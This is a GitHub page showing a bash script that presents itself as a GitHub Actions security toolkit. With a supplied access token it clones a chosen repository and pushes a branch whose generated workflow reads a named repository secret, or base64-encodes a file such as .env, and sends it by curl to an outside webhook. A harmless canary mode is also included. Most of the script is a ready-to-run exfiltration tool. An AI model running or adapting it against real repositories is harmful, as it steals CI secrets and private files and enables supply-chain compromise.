The-Butler/multi-script.sh at main · addcontent/The-Butler · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
#!/bin/bash
set -e

GREEN='\033[0;32m'
RED='\033[0;31m'
YELLOW='\033[1;33m'
CYAN='\033[0;36m'
NC='\033[0m'

# --- PHASE 0: SETUP & MODE SELECTION ---
echo -e "${CYAN}### Advanced GitHub Actions Security Toolkit (v2) ###${NC}"
echo -e "${RED}WARNING: Read The Docs for usage.${NC}"

echo "Please select an operation mode:"
PS3="Enter your choice: "
select MODE in "Safe Test (Canary Check)" "Exploit (Exfiltrate Repo Secret)" "Exploit (Exfiltrate File Content)"; do
    case $MODE in
        "Safe Test (Canary Check)" ) EXPLOIT_MODE="safe"; break;;
        "Exploit (Exfiltrate Repo Secret)" ) EXPLOIT_MODE="secret"; break;;
        "Exploit (Exfiltrate File Content)" ) EXPLOIT_MODE="file"; break;;
    esac
done

read -p "Enter your GitHub Personal Access Token (PAT): " GITHUB_TOKEN
gh auth login --with-token <<< "$GITHUB_TOKEN"
clear

# --- PHASE 1: TARGET DISCOVERY ---
echo "[*] Discovering accessible repositories..."
PS3="Please select a repository to target: "
REPOS=($(gh repo list --limit 200 --json nameWithOwner -q '.[].nameWithOwner'))
select REPO in "${REPOS[@]}"; do
    [ -n "$REPO" ] && TARGET_REPO=$REPO && break || echo "Invalid selection."
done
echo -e "\n[*] Targeting repository: ${YELLOW}$TARGET_REPO${NC}"

# --- PHASE 2: PAYLOAD CONFIGURATION ---
POC_BRANCH="pentest-run-$(date +%s)"
case $EXPLOIT_MODE in
    "secret")
        echo -e "\n${RED}### CONFIGURE SECRET EXFILTRATION ###${NC}"
        read -p "Enter the exact name of the repository secret to exfiltrate: " SECRET_TO_STEAL
        read -p "Enter your webhook URL for exfiltration: " WEBHOOK_URL
        ;;
    "file")
        echo -e "\n${RED}### CONFIGURE FILE EXFILTRATION ###${NC}"
        read -p "Enter the full path of the file to exfiltrate (e.g., .env): " FILE_TO_STEAL
        read -p "Enter your webhook URL for exfiltration: " WEBHOOK_URL
        ;;
    "safe")
        echo -e "\n${YELLOW}### CONFIGURE SAFE TEST ###${NC}"
        CANARY_SECRET_NAME="PENTEST_CANARY_$(date +%s)"
        echo "Go to '$TARGET_REPO' settings and create the following secret:"
        echo "Secret Name:  ${CYAN}$CANARY_SECRET_NAME${NC}"
        echo "Secret Value: ${CYAN}safe-test-successful${NC}"
        read -p "Press [Enter] once the secret is created..."
        ;;
esac

# --- PHASE 3: EXECUTION ---
REPO_URL="https://x-access-token:$GITHUB_TOKEN@github.com/$TARGET_REPO.git"
CLONE_DIR="${TARGET_REPO##*/}"

echo "[*] Cloning repository using authenticated URL..."
git clone "$REPO_URL" "$CLONE_DIR" && cd "$CLONE_DIR"
git checkout -b $POC_BRANCH
mkdir -p .github/workflows

YAML_CONTENT=""
if [ "$EXPLOIT_MODE" = "secret" ]; then
    YAML_CONTENT=$(cat <<EOF
name: Secret Exploit Payload
on:
  push:
    branches:
      - "$POC_BRANCH"
jobs:
  exfil_secret:
    runs-on: ubuntu-latest
    steps:
      - name: "Exfiltrate secret: $SECRET_TO_STEAL"
        env:
          STOLEN_SECRET: \${{ secrets.$SECRET_TO_STEAL }}
        run: |
          curl -X POST -H "Content-Type: application/json" --data "{\\"value\\":\\"\$STOLEN_SECRET\\"}" "$WEBHOOK_URL"
EOF
)
elif [ "$EXPLOIT_MODE" = "file" ]; then
    YAML_CONTENT=$(cat <<EOF
name: File Exfiltration Payload
on:
  push:
    branches:
      - "$POC_BRANCH"
jobs:
  exfil_file:
    runs-on: ubuntu-latest
    steps:
      - name: Check out repository code
        uses: actions/checkout@v4
      - name: "Exfiltrate file: $FILE_TO_STEAL"
        run: |
          if [ -f "$FILE_TO_STEAL" ]; then
            ENCODED_CONTENT=\$(base64 -w 0 "$FILE_TO_STEAL")
            curl -X POST -H "Content-Type: application/json" --data "{\\"file_path\\":\\"$FILE_TO_STEAL\\",\\"content_base64\\":\\"\$ENCODED_CONTENT\\"}" "$WEBHOOK_URL"
          else
            curl -X POST -H "Content-Type: application/json" --data "{\\"error\\":\\"File not found: $FILE_TO_STEAL\\"}" "$WEBHOOK_URL"
          fi
EOF
)
else # Safe mode
    YAML_CONTENT=$(cat <<EOF
name: Safe Pentest PoC
on:
  push:
    branches:
      - "$POC_BRANCH"
jobs:
  canary_test:
    runs-on: ubuntu-latest
    steps:
      - name: "Test Canary Secret"
        env:
          CANARY: \${{ secrets.$CANARY_SECRET_NAME }}
        run: |
          if [ -n "\$CANARY" ]; then
            gh issue create --title "PoC SUCCESS: Secret Accessible" --body "Safe canary secret '$CANARY_SECRET_NAME' was read from branch: $POC_BRANCH"
          fi
EOF
)
fi

echo "$YAML_CONTENT" > .github/workflows/pentest.yml

echo "[*] Pushing payload to trigger workflow..."
git add . && git commit -m "Run security test" && git push --set-upstream origin "$POC_BRANCH"

echo "[*] Monitoring workflow run... Please wait."
RUN_ID=$(gh run list --branch $POC_BRANCH --limit 1 --json databaseId -q '.[0].databaseId' 2>/dev/null)
gh run watch "$RUN_ID" --exit-status

echo -e "\n${GREEN}✅ PAYLOAD SENT!${NC} The workflow has been triggered."
if [ "$EXPLOIT_MODE" != "safe" ]; then
    echo -e "Check your webhook for the results: ${YELLOW}$WEBHOOK_URL${NC}"
fi